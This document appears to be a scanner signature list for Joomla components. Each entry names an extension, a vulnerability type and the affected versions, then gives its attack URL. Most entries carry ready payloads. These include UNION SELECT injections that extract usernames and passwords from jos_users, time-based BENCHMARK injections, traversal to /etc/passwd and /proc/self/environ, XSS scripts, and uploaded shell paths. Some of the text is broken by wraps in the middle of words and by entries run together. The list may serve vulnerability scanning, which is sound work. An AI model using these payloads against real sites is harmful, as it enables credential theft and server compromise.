Component: Joomla "com_equipment" Sql Injection Versions Affected: "Any" |/index.php?option=com_equipment&task=components&id=45&sec_men_id=|/index.php?option=com_equipment&task=components&id=45&sec_men_id=
Component: Amblog SQL Injection Versions Affected: 1.0 |/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version|/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
Component: JComponent (com_yellowpages) SQL Injection Versions Affected: "Any" |/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--|/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users-
Component: JComponent com_neorecruit SQL Injection Versions Affected: 1.4 |/index.php?option=com_neorecruit&task=offer_view&id=|/index.php?option=com_neorecruit&task=offer_view&id=
Component: cgTestimonial XSS Versions Affected: 2.2 |/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>|/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
Component: JComponent (com_camelcitydb2) SQL Injection Versions Affected: All version |/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--|/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-
Component: Spielothek SQL Injection Versions Affected: 1.6.9 |/index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))|/index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
Component: Spielothek SQL Injection Versions Affected: 1.6.9 |/index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))|/index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
Component: Spielothek SQL Injection Versions Affected: 1.6.9 |/index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))|/index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
Component: Joomla "com_beamospetition" Sql Injection Versions Affected: "All" |/index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users--|/index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
Component: Joomla Component (com_simpleshop) SQL Injection Versions Affected: "any" |/index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--|/index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-
Component: PBBooking SQL Injection Versions Affected: 1.0.4_3|/index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))|/index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
Component: Joomla Component(com_joomla-visites) RFI Versions Affected: Any |/administrator/components/com_joomla-visites/|//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
Component: Joomla "com_youtube" Sql Injection Vulnerability Versions Affected: 1.5 |/index.php?option=com_youtube&id_cate=4|/index.php?option=com_youtube&id_cate=4
Component: Joomla Component Joomdle SQL vulnerability Versions Affected: 0.24 or lower ;) |/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=|/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
Component: Joomla Component (com_oziogallery) SQL Injection Versions Affected: Any |/index.php?option=com_oziogallery&Itemid=|/index.php?option=com_oziogallery&Itemid=
Component: Joomla Component com_iproperty SQL Injection Vulnerability Versions Affected: Any |/index.php?option=com_iproperty&view=agentproperties&id=|/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users
Component: Joomla Component com_huruhelpdesk SQL Injection Vulnerability Versions Affected: Any |/index.php?option=com_huruhelpdesk&view=detail&cid[0]=|/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users-
Component: Joomla Component (com_staticxt) SQL Injection Vulnerability Versions Affected: Any |/index.php?option=com_staticxt&staticfile=test.php&id=1923|/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
Component: Joomla Component (com_spa) SQL Injection Vulnerability Versions Affected: Any |/index.php?option=com_spa&view=spa_product&cid=|/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users
Component: Joomla EasyBlog Persistent XSS Vulnerability Versions Affected: Any |/easyblog/entry/uncategorized|/">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>
Component: Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection Versions Affected: Any |/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube|/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
Component: Joomla Component com_golfcourseguide SQL Injection Vulnerability Versions Affected: Any |/index.php?option=com_golfcourseguide&view=golfcourses&cid
=1&id=|/index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= Component: Joomla com_mysms Upload Vulnerability Versions Affected: Any |/?option=com_mysms&Itemid=0&task=phonebook|/?option=com_mysms&Itemid=0&task=phonebook

Component: Joomla com_myhome BSQLi Vulnerability Versions Affected: Any |/inde x.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm= Component: Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerabil ity Versions Affected: 1.0.4 and previous |/index.php?option=com_qcontacts&Ite mid=1'|/index.php?option=com_qcontacts&Itemid=1' Component: Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerabi lity Versions Affected: Any |/index.php?option=com_seyret&view=|/index.php?opt ion=com_seyret&view= Component: Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulne rability Versions Affected: v2.7.3 |/index.php?option=com_phocagallery&view=ca tegories&Itemid=|/index.php?option=com_phocagallery&view=categories&Itemid= Component: Joomla Component (com_obSuggest) Local File Inclusion Vulnerability Versions Affected: Any |/index.php?option=com_obsuggest&controller=|/index.php? option=com_obsuggest&controller= Component: Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerabi lity Versions Affected: Any |/index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../|/index.php?option=c om_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir =../../../ Component: Joomla com_quran SQL Injection vulnerability Versions Affected: Any |/component/quran/index.php?option=com_quran&action=viewayat&surano=|/component /quran/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/ **/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)r 3m1ck,3,4,5/**/FROM/**/jos_users-Component: Joomla Component Matamko Local File Inclusion Vulnerability Version s Affected: Any |/index.php?option=com_matamko&controller=|/index.php?option=com _matamko&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability Versions Affected: Any 
|/index.php?option=com_iproperty&view=agentproperties& id=|/index.php?option=com_iproperty&view=agentproperties&id= Component: Joomla Component JA Comment Local File Inclusion Vulnerability Vers ions Affected: Any |/index.php?option=com_jacomment&view=|/index.php?option=com_ jacomment&view=../../../../../../../../../../etc/passwd%00 Component: Joomla Component (com_team) SQL Injection Vulnerability Versions Aff ected: Any |/print.php?task=person&id=36 and 1=1|/print.php?task=person&id=36 an d 1=1 Component: Joomla Component com_question SQL Injection Vulnerability Versions Affected: Any |/index.php/?option=com_question&catID=21' and+1=0 union all|/inde x.php/?option=com_question&catID=21' and+1=0 union all Component: Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability Versions Affected: Any |/components/com_xgallery/helpers/img.php?file=|/compon ents/com_xgallery/helpers/img.php?file= Component: Joomla Component (com_jimtawl) LFI Vulnerability Versions Affected: Any |/index.php?option=com_jimtawl&Itemid=12&task=|/index.php?option=com_jimtaw l&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ% 00 Component: Joomla Component com_jfuploader < 2.12 Remote File Upload Versions Affected: Any |/index.php?option=com_jfuploader&Itemid=|/index.php?option=com_jf uploader&Itemid= Component: Joomla Component (com_markt) SQL Injection Vulnerability Versions A ffected: Any |/index.php?option=com_markt&page=show_category&catid=7+union+selec t+0,1,password,3,4,5,username,7,8+from+jos_users--|/index.php?option=com_markt&p age=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_ users-Component: Joomla Component (com_connect) Local File Inclusion Vulnerability V ersions Affected: Any |/index.php?option=com_connect&view=connect&controller=|/i ndex.php?option=com_connect&view=connect&controller=../../../CREDITS.php%00 Component: Joomla com_quran SQL Injection vulnerability Versions Affected: Any 
|/component/quran/index.php?option=com_quran&action=viewayat&surano=|/component/quran/index.php?option=com_quran&action=viewayat&surano=

Component: Joomla Component (com_alfurqan15x) SQL Injection Vulnerability Vers ions Affected: Any |/index.php?option=com_alfurqan15x&action=viewayat&surano=|/i ndex.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1 ,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users-Component: Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Versions Affected: Any |/index.php?option=com_jeajaxeventcalendar&v iew=alleventlist_more&event_id=-13|/index.php?option=com_jeajaxeventcalendar&vie w=alleventlist_more&event_id=-13 Component: Joomla Component Alameda SQL Injection Versions Affected: 1.0 |/ind ex.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+sel ect+concat_ws(0x3a,username,password)+from+jos_users--|/index.php?option=com_ala meda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,us ername,password)+from+jos_users-Component: Joomla Component Time Returns SQL Injection Versions Affected: 2.0 |/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat _ws(0x3a,username,password),2,3,4,5,6+from+jos_users--|/index.php?option=com_tim ereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password ),2,3,4,5,6+from+jos_users-Component: Joomla Simple File Lister module Directory Traversal Vulnerability Versions Affected: 1.0 |/index.php?option=com_content&view=article&id=[A VALID I D]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../|/index.php?option=com_cont ent&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../ ../ Component: YJ Contact us - Enhanced Joomla Contact Form Local File Inclusion V ersions Affected: "Any" |/index.php?option=com_yjcontactus&view=|/index.php?opti on=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../.. 
/etc/passwd%00 Component: Joomla com_remository Remote Upload File Versions Affected: "Any" | /components/com_remository_files/file_image_14/1276100016shell.php|/components/c om_remository_files/file_image_14/1276100016shell.php Component: JoomTouch Local File Inclusion Versions Affected: 1.0.2 |/index.php ?option=com_joomtouch&controller=|/index.php?option=com_joomtouch&controller=../ ../../../../../../../../../../../../../../../../../../etc/passwd%00 Component: TNR Enhanced Joomla Search SQL Injection Versions Affected: 3.0.0 | /index.php?search=NoGe&option=com_esearch&searchId=|/index.php?search=NoGe&optio n=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11,12,13,14+from+jos_users-Component: Joomla Component com_jdirectory SQL Injection Versions Affected: "A ny" |/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/ directory,1/Itemid,0|/component/option,com_jdirectory/task,show_content/contenti d,1067/catid,26/directory,1/Itemid,0 Component: Joomla Component com_restaurantguide SQL Injection Versions Affecte d: 1.0.0 |/index.php?option=com_restaurantguide&view=country&id='&Itemid=69|/ind ex.php?option=com_restaurantguide&view=country&id='&Itemid=69 Component: Joomla Component Mosets Tree Shell Upload Versions Affected: 2.1.5 |/components/com_mtree/img/listings/o/{id}.php|/components/com_mtree/img/listing s/o/{id}.php Component: Joomla Component FDione Form Wizard LFI Versions Affected: 1.0.2 <= |/index.php?option=com_dioneformwizard&controller=[LFI]%00|/index.php?option=co m_dioneformwizard&controller=[LFI]%00 Component: Joomla Component Seber Cart Local File Disclosure Versions Affected : 1.0.0.1x <= |/components/com_sebercart/getPic.php?p=[LFD]%00|/components/com_s ebercart/getPic.php?p=[LFD]%00 Component: Component advertising LFI Versions Affected: 2.0 <= |/index.php?opt ion=com_aardvertiser&cat_name=conf&task=<=|/index.php?option=com_aardvertiser&ca t_name=conf&task= Component: Component 
advertising LFI Versions Affected: 2.0 <= |/index.php?option=com_aardvertiser&task=|/index.php?option=com_aardvertiser&task= Component: Component com_konsultasi SQL Versions Affected: Any <= |/index.php?option=com_konsultasi&act=detail&sid=|/index.php?option=com_konsultasi&act=detai

l&sid= Component: Custom PHP Pages Component LFI Versions Affected: Any <= |/index.ph p?option=com_php&file=../images/phplogo.jpg|/index.php?option=com_php&file=../im ages/phplogo.jpg Component: Custom PHP Pages Component LFI Versions Affected: Any <= |/index.ph p?option=com_php&file=../js/ie_pngfix.js|/index.php?option=com_php&file=../js/ie _pngfix.js Component: Custom PHP Pages Component LFI Versions Affected: Any <= |/index.ph p?option=com_php&file=../../../../../../../../../../etc/passwd|/index.php?option =com_php&file=../../../../../../../../../../etc/passwd Component: Component com_articleman Versions Affected: Any <= |/index.php?opti on=com_articleman&task=new|/index.php?option=com_articleman&task=new Component: Alpha2 Versions Affected: 1.6.0 <= |/Joomla_1.6.0-Alpha2-Full-Packa ge/components/com_mailto/assets/close-x.png|/Joomla_1.6.0-Alpha2-Full-Package/co mponents/com_mailto/assets/close-x.png Component: Component Card View JX XSS Versions Affected: Any <= |/index.php?op tion=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=|/index.php?option=com_grid&g id=15_ok_0',%20'15_ok_0&data_search= Component: Component Card View JX XSS Versions Affected: Any <= |/index.php?op tion=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=|/index.php?option=com_g rid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= Component: Component Table JX XS Versions Affected: Any <= |/index.php?option= com_grid&gid=15_ok_0',%20'15_ok_0&data_search=|/index.php?option=com_grid&gid=15 _ok_0',%20'15_ok_0&data_search= Component: Component com_newsfeeds SQL injection Versions Affected: Any <= |/i ndex.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,con cat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--|/index.php?option=com_ newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char% 2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 
5,26,27,28,29,30%20from%20jos_users-Component: Wap4Joomla SQL Injection Versions Affected: Any <= |/wap/wapmain.ph p?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos _users+limit+0,1--|/wap/wapmain.php?option=onews&action=link&id=-154+union+selec t+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-Component: Component graphics LFI Versions Affected: 1.0.6 <= |/index.php?opti on=com_graphics&controller=|/index.php?option=com_graphics&controller= Component: ABC Extension com_abc SQL Versions Affected: 1.1.7 <= |/index.php?o ption=com_abc&view=abc&letter=AS&sectionid='|/index.php?option=com_abc&view=abc& letter=AS&sectionid=' Component: SmartSite LFI Versions Affected: Any <= |/index.php?option=com_smar tsite&controller=|/index.php?option=com_smartsite&controller= Component: NoticeBoard Local File Inclusion Versions Affected: 1.3<= |/index.p hp?option=com_noticeboard&controller=|/index.php?option=com_noticeboard&controll er= Component: Ultimate Portfolio Local File Inclusion Versions Affected: 1.0<= |/ index.php?option=com_ultimateportfolio&controller=|/index.php?option=com_ultimat eportfolio&controller= Component: Component com_joomradio SQL injection Versions Affected: Any<= |/in dex2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat (username,0x3a,password),3,4,5,6,7+from+jos_users--|/index2.php?option=com_joomr adio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password), 3,4,5,6,7+from+jos_users-Component: Joomla com_socialads Persistent Xss Vulnerability Versions Affecte d: Any <= |/js/index.php?option=com_socialads&view=showad&Itemid=94|">><marquee> <h1>XSS3d By Sid3^effects</h1><marquee> Component: Joomla Jobprofile Component (com_jobprofile) SQL Injection Versions Affected: Any <= 
|/index.php?option=com_jobprofile&Itemid=61&task=profilesview&

id=1'|/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+a ll+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users-Component: QContacts 1.0.6 (Joomla component) SQL injection Versions Affected: 1.0.6 <= |/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_o rder_Dir=&option=com_qcontacts|/index.php?option=com_qcontacts?=catid=0&filter_o rder=[SQLi]&filter_order_Dir=&option=com_qcontacts Component: Joomla Component (com_dshop) SQL Injection Vulnerability Versions A ffected: Any <= |/index.php?option=com_dshop&controller=fpage&task=flypage&idofi tem=12|/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12+uni on+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users Component: Joomla com_jnewsletter SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_jstore&controller=product-display&task=1'|/index.php?opt ion=com_jstore&controller=product-display&task=1' Component: Joomla com_jsubscription SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_jsubscription&controller=subscription&task=1'|/index.p hp?option=com_jsubscription&controller=subscription&task=1' Component: Joomla com_jmarket SQLi Vulnerability Versions Affected: Any <= |/i ndex.php?option=com_jmarket&controller=product&task=1'|/index.php?option=com_jma rket&controller=product&task=1' Component: Joomla com_jcommunity SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_jcommunity&controller=members&task=1'|/index.php?option=c om_jcommunity&controller=members&task=1' Component: Joomla com_jtickets SQLi Vulnerability Versions Affected: Any <= |/ index.php?option=com_jtickets&controller=ticket&task=1'|/index.php?option=com_jt ickets&controller=ticket&task=1' Component: Joomla com_jstore SQLi Vulnerability Versions Affected: Any <= |/in dex.php?option=com_jstore&controller=product-display&task=1'|/index.php?option=c om_jstore&controller=product-display&task=1' Component: Joomla 
Component com_lead SQL Injection Versions Affected: Any <= | /index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'|/index .php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' Component: Joomla Component ChronoForms (com_chronocontact) Versions Affected: Any <= |/index.php?option=com_chronocontact&itemid=1|/index.php?option=com_chro nocontact&itemid=1 Component: Joomla Component ChronoConnectivity Versions Affected: Any <= |/ind ex.php?option=com_chronoconnectivity&itemid=1|/index.php?option=com_chronoconnec tivity&itemid=1 Component: Joomla component cinema SQL injection Vulnerability Versions Affect ed: Any <= |/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=|/index.php ?option=com_cinema&Itemid=S@BUN&func=deta%20il&id=-99999/**/union/**/select/**/0 ,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,%2019,20,21,22,23,24,25,26,27,2 8,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_usersComponent: Joomla Component com_annonces Upload Vulnerability Versions Affecte d: Any <= |/index.php?option=com_annonces&view=edit&Itemid=1|/index.php?option=c om_annonces&view=edit&Itemid=1 Component: Joomla Component com_searchlog SQL Injection Versions Affected: 3.1 .0 <= |/administrator/index.php?option=com_searchlog&act=log|/administrator/inde x.php?option=com_searchlog&act=log Component: Joomla Component com_djartgallery Multiple Vulnerabilities Versions Affected: 0.9.1 <= |/administrator/index.php?option=com_djartgallery&task=editI tem&cid[]=1'+and+1=1+--+|/administrator/index.php?option=com_djartgallery&task=e ditItem&cid[]=1'+and+1=1+--+ Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability Versions Affected: Any <= |/index.php?option=com_iproperty&view=agentproperti es&id=|/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/ **/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 
24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-Component: Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vuln erability Versions Affected: Any <= |/index.php?option=com_beeheard&controller =../../../../../../../../../../etc/passwd%00|/index.php?option=com_beeheard&cont

roller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component Deluxe Blog Factory com_blogfactory Local File Inclu sion Vulnerability Versions Affected: Any <= |/index.php?option=com_blogfactor y&controller=../../../../../../../../../../etc/passwd%00|/index.php?option=com_b logfactory&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component Delicious Bookmarks com_delicious Local File Inclusi on Vulnerability Versions Affected: Any <= |/index.php?option=com_delicious&co ntroller=../../../../../../../../../../etc/passwd%00|/index.php?option=com_delic ious&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component JA Comment com_jacomment Local File Inclusion Vulner ability Versions Affected: Any <= |/index.php?option=com_jacomment&view=../../ ../../../../../../../../etc/passwd%00|/index.php?option=com_jacomment&view=../.. /../../../../../../../../etc/passwd%00 Component: Joomla Component Love Factory com_lovefactory Local File Inclusion Vu lnerability Versions Affected: Any <= |/index.php?option=com_lovefactory&contr oller=../../../../../../../../../../etc/passwd%00|/index.php?option=com_lovefact ory&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla com_worldrates Local File Inclusion Vulnerability Versions A ffected: Any <= |/index.php?option=com_worldrates&controller=../../../../../../. ./../../../etc/passwd%00|/index.php?option=com_worldrates&controller=../../../.. /../../../../../../etc/passwd%00 Component: Joomla com_record Local File Inclusion Vulnerability Versions Affec ted: Any <= |/index.php?option=com_record&controller=../../../../../../../../../ ../etc/passwd%00|/index.php?option=com_record&controller=../../../../../../../.. /../../etc/passwd%00 Component: Joomla Component JA Voice com_javoice LFI vulnerability Versions Af fected: Any <= |/index.php?option=com_javoice&view=../../../../../../../../../.. 
/../../../../../etc/passwd%00|/index.php?option=com_javoice&view=../../../../../ ../../../../../../../../../../etc/passwd%00 Component: Joomla Component com_pcchess Local File Inclusion Versions Affected : Any <= |/index.php?option=com_pcchess&controller=../../../../../../../../../.. /../../../etc/passwd%00|/index.php?option=com_pcchess&controller=../../../../../ ../../../../../../../../etc/passwd%00 Component: Joomla component huruhelpdesk SQL injection Vulnerability Versions Affected: Any <= |/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1|/inde x.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 Component: Joomla Component com_properties[aid] SQL Injection Vulnerability Ve rsions Affected: Any <= |/index.php?option=com_properties&task=agentlisting&aid= |/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2 ,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from +jos_users-Component: Joomla component huruhelpdesk SQL injection Vulnerability Versions Affected: Any <= |/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1|/inde x.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 Component: Joomla Discussions Component (com_discussions) SQL Injection Vulnerab ility Versions Affected: Any <= |/index.php?option=com_discussions&view=thread &catid=[Correct CatID]&thread=-1|/index.php?option=com_discussions&view=thread&c atid=[Correct CatID]&thread=-1 Component: Joomla com_jomdirectory SQL-inj Vuln Versions Affected: Any <= |/in dex.php?option=com_jomdirectory&task=search&type=111+|/index.php?option=com_jomd irectory&task=search&type=111+ Component: Joomla Component com_advert SQLi Vulnerability Versions Affected: A ny <= |/index.php?option=com_advert&id=36'|/index.php?option=com_advert&id=36' Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= 
|/index.php?option=com_products&task=category&catid=-1|/index.php?option=com_products&task=category&catid=-1 Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_products&id=-1|/index.php?option=com_products&id=-1

Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_products&catid=-1|/index.php?option=com_products&catid=-1 Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_products&product_id=-1|/index.php?option=com_products&product_id=-1 Component: Joomla Component com_bbs SQLinjection Vulnerability Versions Affected: Any <= |/index.php?option=com_bbs&bid=-1|/index.php?option=com_bbs&bid=-1 Component: Joomla Component com_firmy SQLinjection Vulnerability Versions Affected: Any <= |/index.php?option=com_firmy&task=section_show_set&Id=-1|/index.php?option=com_firmy&task=section_show_set&Id=-1 Component: Joomla Component (com_bnf) SQL Injection Vulnerability Versions Affected: Any <= |/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1|/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
